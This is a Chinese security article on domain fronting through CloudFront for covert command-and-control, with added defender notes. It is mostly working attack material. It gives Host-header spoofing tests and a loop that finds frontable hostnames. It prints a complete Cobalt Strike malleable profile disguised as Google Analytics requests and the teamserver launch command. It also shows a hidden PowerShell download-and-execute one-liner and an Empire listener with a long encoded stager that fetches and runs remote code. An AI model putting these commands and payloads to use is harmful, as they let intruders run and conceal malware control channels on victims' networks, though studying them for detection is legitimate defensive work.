本文讲的是《隐匿的攻击之-Domain Fronting》。
0x01 简介
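# Baseline: fetch the test file directly from the author's own host.
wget -U demo -q -O - http://evi1cg.me/foo.txt
# output shown on the page: hello there !

# Same path requested from a cloudfront.net distribution hostname; the page
# shows the same body, so the distribution presumably fronts the host above.
wget -U demo -q -O - http://d289wv3b5uz3me.cloudfront.net/foo.txt
# output shown on the page: hello there !

# Same path requested from an unrelated hostname with no Host override.
# The page shows no output for this request.
wget -U demo -q -O - http://a0.awsstatic.com/foo.txt

# The URL still names a0.awsstatic.com, but the Host header names the
# distribution. The page shows no output for this line either.
#
# Defender note: the hostname that DNS and URL-based proxy logs record
# (a0.awsstatic.com) differs from the Host header the CDN routes on.
# Over plain HTTP, as here, both values are visible on the wire, so a proxy
# or IDS can compare them. Over HTTPS the comparison is between the TLS SNI
# and the inner Host header, which is only possible with TLS inspection.
wget -U demo -q -O - http://a0.awsstatic.com/foo.txt --header "Host: d289wv3b5uz3me.cloudfront.net"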
# Walk the labels a0 .. z9 under awsstatic.com, sending every request with the
# same fixed Host header, and print each label for which wget exits successfully.
# Requires a shell with brace expansion (bash/zsh).
#
# Defender note: in proxy or CDN logs this appears as a short burst of requests
# to many sibling hostnames that all carry one identical, non-matching Host
# header and the same User-Agent ("demo").
for i in {a..z}; do
  for j in {0..9}; do
    wget -U demo -q -O - "http://${i}${j}.awsstatic.com/foo.txt" \
      --header "Host: d289wv3b5uz3me.cloudfront.net" \
      && echo "${i}${j}"
  done
done
cdn.az.gov,cdn.zendesk.com,cdn.atlassian.com,a1.awsstatic.com,f0.awsstatic.com
http-get { client { header "Host" "[your distribution].cloudfront.net";
http-post { client { header "Host" "[your distribution].cloudfront.net";
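# make our C2 look like a Google Web Bug
# https://developers.google.com/analytics/resources/articles/gaTrackingTroubleshooting
#
# Author: @armitagehacker
#
# NOTE(review): on the page this profile was collapsed onto a single line, so
# the leading '#' turned every directive into comment text. Line breaks are
# restored here; every directive and string is unchanged.
#
# Defender notes, all taken from the directives below:
#   - Both the GET and the POST transaction set a fixed Host header naming a
#     cloudfront.net distribution, regardless of the hostname connected to.
#   - The GET uses Google-Analytics-style query parameters (utmac, utmcn, ...)
#     with constant values, on the URI /__utm.gif.
#   - The POST goes to /___utm.gif (three underscores) with a request
#     Content-Type of application/octet-stream.
#   - Server responses claim Content-Type image/gif and prepend fixed bytes
#     to the returned data.

http-get {
    set uri "/__utm.gif";

    client {
        parameter "utmac" "UA-2202604-2";
        parameter "utmcn" "1";
        parameter "utmcs" "ISO-8859-1";
        parameter "utmsr" "1280x1024";
        parameter "utmsc" "32-bit";
        parameter "utmul" "en-US";
        # The fronting-specific line: the Host header names the distribution.
        header "Host" "d289wv3b5uz3me.cloudfront.net";

        # Session metadata is NetBIOS-encoded, prefixed with "__utma" and sent
        # in the utmcc query parameter.
        metadata {
            netbios;
            prepend "__utma";
            parameter "utmcc";
        }
    }

    server {
        header "Content-Type" "image/gif";

        output {
            # hexdump pixel.gif
            # 0000000 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00
            # 0000010 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00
            # 0000020 01 00 01 00 00 02 01 44 00 3b
            #
            # NOTE(review): the two longer strings below hold 15 bytes each,
            # one fewer than the 16-byte hexdump rows above; kept as on the page.
            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";

            print;
        }
    }
}

http-post {
    set uri "/___utm.gif";

    client {
        header "Content-Type" "application/octet-stream";

        # The session id is wrapped as UA-220<id>-2 and sent in the utmac
        # query parameter.
        id {
            prepend "UA-220";
            append "-2";
            parameter "utmac";
        }

        parameter "utmcn" "1";
        parameter "utmcs" "ISO-8859-1";
        parameter "utmsr" "1280x1024";
        parameter "utmsc" "32-bit";
        parameter "utmul" "en-US";
        # Same fixed Host header as in http-get.
        header "Host" "d289wv3b5uz3me.cloudfront.net";

        # Output is sent as the request body.
        output {
            print;
        }
    }

    server {
        header "Content-Type" "image/gif";

        output {
            prepend "\x01\x00\x01\x00\x00\x02\x01\x44\x00\x3b";
            prepend "\xff\xff\xff\x21\xf9\x04\x01\x00\x00\x00\x2c\x00\x00\x00\x00";
            prepend "\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00";
            print;
        }
    }
}

# dress up the staging process too
http-stager {
    server {
        header "Content-Type" "image/gif";
    }
}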
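# Check the edited profile with c2lint before it is loaded.
./c2lint Malleable-C2-Profiles/normal/webbug.profile

# Start the team server with that profile. Arguments as given on the page:
# bind address placeholder, the sample password "hacktest", then the profile.
# NOTE(review): the page printed a stray "cobal" before "sudo". It looks like
# shell-prompt residue from the original screenshot or listing, not part of
# the command, so it is dropped here.
sudo ./teamserver [your ip] hacktest webbug.profile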
# Download-and-execute one-liner as shown on the page.
#   -nop       : do not load the PowerShell profile
#   -w hidden  : run with a hidden window
#   -c "..."   : command string; it fetches the text at the URL with
#                Net.WebClient.DownloadString and passes it to IEX
#                (Invoke-Expression).
# The URL names the cloudfront.net distribution directly on port 80, so DNS
# and proxy logs will show that hostname for this request.
# Defender note: this command line is recorded by process-creation auditing
# with command-line capture (Security event 4688 or Sysmon event 1), and the
# downloaded script by PowerShell script block logging (event 4104).
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://d289wv3b5uz3me.cloudfront.net:80/a'))"
(Empire: listeners) > uselistener http
(Empire: listeners/http) >
(Empire: listeners/http) > set Host http://cdn.az.gov:80
(Empire: listeners/http) > set DefaultProfile /admin/get.php,/news.asp,/login/process.jsp|Mozilla/5.0 (WindowsNT 6.1; WOW64; Trident/7.0;rv:11.0) like Gecko | Host:d289wv3b5uz3me.cloudfront.net
(Empire: listeners/http) > execute
[*] Starting listener 'http'
[+] Listener successfully started!
(Empire: listeners) > usestager multi/launcher (Empire: stager/multi/launcher) > set Listener http (Empire: stager/multi/launcher) > generate powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBSAEUAZgBdAC4AQQBTAFMARQBNAGIAbABZAC4ARwBlAFQAVABZAFAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAVABGAGkAZQBMAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAQQBMAFUARQAoACQATgBVAGwATAAsACQAVAByAFUARQApAH0AOwBbAFMAeQBTAHQAZQBtAC4ATgBFAHQALgBTAGUAUgB2AGkAYwBlAFAATwBpAE4AVABNAGEAbgBhAEcAZQByAF0AOgA6AEUAWABwAGUAQwB0ADEAMAAwAEMAbwBOAHQASQBOAFUAZQA9ADAAOwAkAHcAQwA9AE4ARQBXAC0ATwBCAEoARQBDAHQAIABTAHkAUwBUAEUATQAuAE4AZQBUAC4AVwBFAEIAQwBMAEkARQBOAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwBOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAFcAYwAuAEgARQBBAEQARQBSAFMALgBBAEQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAUgBvAHgAWQA9AFsAUwBZAHMAVABFAG0ALgBOAGUAdAAuAFcARQBiAFIARQBxAFUAZQBTAFQAXQA6ADoARABlAEYAYQB1AEwAdABXAEUAQgBQAHIAbwBYAHkAOwAkAHcAYwAuAFAAUgBvAHgAeQAuAEMAUgBlAEQARQBOAHQAaQBhAEwAcwAgAD0AIABbAFMAWQBzAHQARQBtAC4ATgBlAFQALgBDAHIAZQBEAGUAbgBUAEkAQQBsAEMAQQBjAGgAZQBdADoAOgBEAEUARgBhAFUAbAB0AE4ARQBUAHcATwByAGsAQwByAGUAZABlAG4AVABJAGEAbABTADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQBYAFQALgBFAG4AQwBvAGQASQBuAEcAXQA6ADoAQQBTAEMASQBJAC4ARwBFAHQAQgB5AHQARQBzACgAJwBlADEAMABhAGQAYwAzADkANAA5AGIAYQA1ADkAYQBiAGIAZQA1ADYAZQAwADUANwBmADIAMABmADgAOAAzAGUAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AVQBuAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBd
ACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AQgB4AE8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AEMALgBIAEUAQQBEAGUAcgBzAC4AQQBkAGQAKAAiAEgAbwBzAHQAIgAsACIAZAAyADgAOQB3AHYAMwBiADUAdQB6ADMAbQBlAC4AYwBsAG8AdQBkAGYAcgBvAG4AdAAuAG4AZQB0ACIAKQA7ACQAVwBjAC4ASABFAEEAZABFAHIAUwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AUgBTAHoAKwB5AEQAUABVAFEAcgBwAGwAVQBNAGQAbABKAEIAKwBVAEoAZwBEAHAAagB1AHcAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvAGMAZABuAC4AYQB6AC4AZwBvAHYAOgA4ADAAJwA7ACQAdAA9ACcALwBuAGUAdwBzAC4AYQBzAHAAJwA7ACQAZABBAHQAYQA9ACQAVwBDAC4ARABPAFcATgBsAG8AYQBEAEQAYQB0AEEAKAAkAHMARQByACsAJABUACkAOwAkAGkAVgA9ACQAZABBAHQAQQBbADAALgAuADMAXQA7ACQAZABhAHQAYQA9ACQARABBAHQAQQBbADQALgAuACQARABBAFQAYQAuAEwARQBuAGcAdABIAF0AOwAtAGoAbwBpAG4AWwBDAGgAYQBSAFsAXQBdACgAJgAgACQAUgAgACQARABhAFQAQQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA
原文发布时间为:2017年2月28日
本文作者:Evi1cg
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。